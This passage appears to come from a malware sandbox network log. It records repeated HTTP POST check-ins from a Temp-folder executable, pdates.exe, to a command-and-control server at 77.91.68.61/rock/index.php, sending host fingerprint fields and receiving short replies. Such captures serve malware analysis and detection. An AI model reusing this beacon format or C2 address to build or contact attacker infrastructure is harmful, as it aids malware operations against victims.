Jul 27, 2023 01:35:33.766468048 CEST	4190	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:33.814343929 CEST	4191	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
569	192.168.2.5	50290	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:34.024107933 CEST	4191	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:34.072303057 CEST	4192	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.5	49774	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:18.671825886 CEST	2902	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:18.720021963 CEST	2902	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
570	192.168.2.5	50291	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:34.261540890 CEST	4192	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:34.309987068 CEST	4192	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
571	192.168.2.5	50292	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:34.476248980 CEST	4193	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:34.525054932 CEST	4193	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
572	192.168.2.5	50293	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:34.685010910 CEST	4194	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:34.734278917 CEST	4194	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
573	192.168.2.5	50294	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:34.903904915 CEST	4195	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:34.952240944 CEST	4195	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
574	192.168.2.5	50295	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:35.125902891 CEST	4196	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:35.175029039 CEST	4196	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
575	192.168.2.5	50296	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:35.334764957 CEST	4197	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:35.383569956 CEST	4197	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
576	192.168.2.5	50297	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:35.535993099 CEST	4198	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:35.584462881 CEST	4198	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
577	192.168.2.5	50298	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:35.762919903 CEST	4199	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:35.811259031 CEST	4199	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
578	192.168.2.5	50299	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:35.973613024 CEST	4200	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:36.021589994 CEST	4200	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
579	192.168.2.5	50300	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:36.177761078 CEST	4201	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:36.226125956 CEST	4201	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.5	49775	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:18.904755116 CEST	2903	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:18.953665972 CEST	2903	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
580	192.168.2.5	50301	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:36.386019945 CEST	4202	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:36.434478998 CEST	4202	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
581	192.168.2.5	50302	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:36.597651958 CEST	4203	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:36.646898985 CEST	4203	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
582	192.168.2.5	50303	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:36.834656954 CEST	4204	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:36.883770943 CEST	4204	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
583	192.168.2.5	50305	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:37.036910057 CEST	4205	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:37.093763113 CEST	4205	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
584	192.168.2.5	50306	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:37.275595903 CEST	4206	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:37.325498104 CEST	4206	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
585	192.168.2.5	50307	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:37.498944998 CEST	4207	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:37.547223091 CEST	4211	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
586	192.168.2.5	50308	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:37.716734886 CEST	4212	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:37.767486095 CEST	4212	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
587	192.168.2.5	50309	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:37.960289001 CEST	4213	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:38.009547949 CEST	4213	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
588	192.168.2.5	50310	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:38.167924881 CEST	4214	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:38.217535019 CEST	4214	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
589	192.168.2.5	50311	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
